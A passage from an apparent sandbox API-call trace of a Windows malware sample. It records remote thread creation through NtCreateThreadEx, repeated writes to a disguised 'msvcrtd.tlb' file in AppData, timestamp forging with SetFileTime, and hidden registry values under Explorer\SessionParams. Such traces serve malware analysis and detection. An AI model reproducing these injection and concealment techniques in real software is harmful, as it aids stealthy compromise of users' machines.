lpNumberOfBytesWritten=0x172be6c*=0x380c) returned 1 [0052.204] GetVersionExW (in: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0052.204] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77ec0000 [0052.204] GetProcAddress (hModule=0x77ec0000, lpProcName="NtCreateThreadEx") returned 0x77f05728 [0052.204] NtCreateThreadEx (in: ThreadHandle=0x172bcdc, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0x138, lpStartAddress=0x50202, lpParameter=0x53800, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x0, SizeOfStackReserve=0x0, lpBytesBuffer=0x172bca4 | out: ThreadHandle=0x172bcdc*=0x134, lpBytesBuffer=0x172bca4) returned 0x0 [0052.205] CloseHandle (hObject=0x130) returned 1 [0052.205] CloseHandle (hObject=0x12c) returned 1 [0052.205] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c28, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0052.205] GetFileType (hFile=0x12c) returned 0x1 [0052.205] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8e [0052.205] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e [0052.205] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d54 | out: lpSystemTimeAsFileTime=0x1729d54*(dwLowDateTime=0xecb31210, dwHighDateTime=0x1d3dfba)) [0052.205] GetLastError () returned 0xb7 [0052.205] SetLastError (dwErrCode=0xb7) [0052.205] GetLastError () returned 0xb7 [0052.205] SetLastError (dwErrCode=0xb7) [0052.205] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1729c3c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1729c3c*=0) returned 0x8e [0052.206] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e [0052.206] GetLastError () returned 0xb7 [0052.206] SetLastError (dwErrCode=0xb7) [0052.206] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x172819c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172819c*=0) returned 0x8e [0052.206] WriteFile (in: hFile=0x12c, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x17281d4, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x17281d4*=0x1f, lpOverlapped=0x0) returned 1 [0052.206] CloseHandle (hObject=0x12c) returned 1 [0052.207] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0052.207] SetFileTime (hFile=0x12c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0052.207] CloseHandle (hObject=0x12c) returned 1 [0052.207] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c10, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0052.207] GetFileType (hFile=0x12c) returned 0x1 [0052.207] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0052.207] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0052.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d3c | out: lpSystemTimeAsFileTime=0x1729d3c*(dwLowDateTime=0xecb31210, dwHighDateTime=0x1d3dfba)) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1729c24*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1729c24*=0) returned 0xad [0052.208] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.208] SetLastError (dwErrCode=0xb7) [0052.208] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.209] GetLastError () returned 0xb7 [0052.209] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.210] SetLastError (dwErrCode=0xb7) [0052.210] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] GetLastError () returned 0xb7 [0052.211] SetLastError (dwErrCode=0xb7) [0052.211] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1728184*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1728184*=0) returned 0xad [0052.211] WriteFile (in: hFile=0x12c, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x17281bc, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x17281bc*=0x85, lpOverlapped=0x0) returned 1 [0052.211] CloseHandle (hObject=0x12c) returned 1 [0052.212] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0052.212] SetFileTime (hFile=0x12c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0052.217] CloseHandle (hObject=0x12c) returned 1 [0052.218] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c08, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0052.218] GetFileType (hFile=0x12c) returned 0x1 [0052.218] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x132 [0052.218] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x132 [0052.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d34 | out: lpSystemTimeAsFileTime=0x1729d34*(dwLowDateTime=0xecb57370, dwHighDateTime=0x1d3dfba)) [0052.218] GetLastError () returned 0xb7 [0052.218] SetLastError (dwErrCode=0xb7) [0052.218] GetLastError () returned 0xb7 [0052.218] SetLastError (dwErrCode=0xb7) [0052.218] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1729c1c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1729c1c*=0) returned 0x132 [0052.219] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x132 [0052.219] GetLastError () returned 0xb7 [0052.219] SetLastError (dwErrCode=0xb7) [0052.219] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x172817c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172817c*=0) returned 0x132 [0052.219] WriteFile (in: hFile=0x12c, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x17281b4, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x17281b4*=0x20, lpOverlapped=0x0) returned 1 [0052.219] CloseHandle (hObject=0x12c) returned 1 [0052.220] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0052.220] SetFileTime (hFile=0x12c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0052.220] CloseHandle (hObject=0x12c) returned 1 [0052.220] WaitForSingleObject (hHandle=0x11c, dwMilliseconds=0xea60) returned 0x0 [0053.590] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c30, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.591] GetFileType (hFile=0x12c) returned 0x1 [0053.591] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x152 [0053.591] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x152 [0053.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d5c | out: lpSystemTimeAsFileTime=0x1729d5c*(dwLowDateTime=0xed86ec70, dwHighDateTime=0x1d3dfba)) [0053.591] GetLastError () returned 0xb7 [0053.591] SetLastError (dwErrCode=0xb7) [0053.591] GetLastError () returned 0xb7 [0053.591] SetLastError (dwErrCode=0xb7) [0053.591] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1729c44*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1729c44*=0) returned 0x152 [0053.591] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x152 [0053.591] GetLastError () returned 0xb7 [0053.591] SetLastError (dwErrCode=0xb7) [0053.591] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x17281a4*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x17281a4*=0) returned 0x152 [0053.591] WriteFile (in: hFile=0x12c, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x17281dc, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x17281dc*=0x18, lpOverlapped=0x0) returned 1 [0053.592] CloseHandle (hObject=0x12c) returned 1 [0053.593] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.593] SetFileTime (hFile=0x12c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0053.593] CloseHandle (hObject=0x12c) returned 1 [0053.593] GetLastError () returned 0x0 [0053.594] SetLastError (dwErrCode=0x0) [0053.594] GetComputerNameW (in: lpBuffer=0x172e340, nSize=0x172e320 | out: lpBuffer="CRH2YWU7", nSize=0x172e320) returned 1 [0053.594] _snwprintf (in: _Dest=0x172f1ec, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0053.594] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x12c, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0053.594] RegQueryValueExA (in: hKey=0x12c, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x58) returned 0x0 [0053.594] RegQueryValueExA (in: hKey=0x12c, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x300d78, lpcbData=0x172e544*=0x58 | out: lpType=0x0, lpData=0x300d78*=0x88, lpcbData=0x172e544*=0x58) returned 0x0 [0053.594] RegCloseKey (hKey=0x12c) returned 0x0 [0053.594] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x12c, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0053.594] RegQueryValueExA (in: hKey=0x12c, lpValueName="Gdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0xff, lpcbData=0x172e548*=0x4) returned 0x2 [0053.594] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x130, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0053.594] RegQueryValueExA (in: hKey=0x130, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0xff, lpcbData=0x172e540*=0x4) returned 0x2 [0053.594] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0053.595] GetFileType (hFile=0x140) returned 0x1 [0053.595] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16a [0053.595] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16a [0053.595] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0xed86ec70, dwHighDateTime=0x1d3dfba)) [0053.595] GetLastError () returned 0xb7 [0053.595] SetLastError (dwErrCode=0xb7) [0053.595] GetLastError () returned 0xb7 [0053.595] SetLastError (dwErrCode=0xb7) [0053.595] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c2e4*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c2e4*=0) returned 0x16a [0053.595] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16a [0053.595] GetLastError () returned 0xb7 [0053.595] SetLastError (dwErrCode=0xb7) [0053.595] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x172a844*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172a844*=0) returned 0x16a [0053.596] WriteFile (in: hFile=0x140, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x172a87c, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172a87c*=0x2d, lpOverlapped=0x0) returned 1 [0053.596] CloseHandle (hObject=0x140) returned 1 [0053.596] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0053.597] SetFileTime (hFile=0x140, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0053.597] CloseHandle (hObject=0x140) returned 1 [0053.597] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e520 | out: phkResult=0x72f1ed90*=0x140, lpdwDisposition=0x172e520*=0x2) returned 0x0 [0053.597] RegSetValueExA (in: hKey=0x140, lpValueName="Gdx", Reserved=0x0, dwType=0x4, lpData=0x172e578*=0x0, cbData=0x4 | out: lpData=0x172e578*=0x0) returned 0x0 [0053.597] RegCloseKey (hKey=0x140) returned 0x0 [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.597] SetLastError (dwErrCode=0x0) [0053.597] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] GetLastError () returned 0x0 [0053.598] SetLastError (dwErrCode=0x0) [0053.598] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0053.598] GetFileType (hFile=0x140) returned 0x1 [0053.598] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0053.599] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0053.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0xed86ec70, dwHighDateTime=0x1d3dfba)) [0053.599] GetLastError () returned 0xb7 [0053.599] SetLastError (dwErrCode=0xb7) [0053.599] GetLastError () returned 0xb7 [0053.599] SetLastError (dwErrCode=0xb7) [0053.599] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c2d4*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c2d4*=0) returned 0x197 [0053.599] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 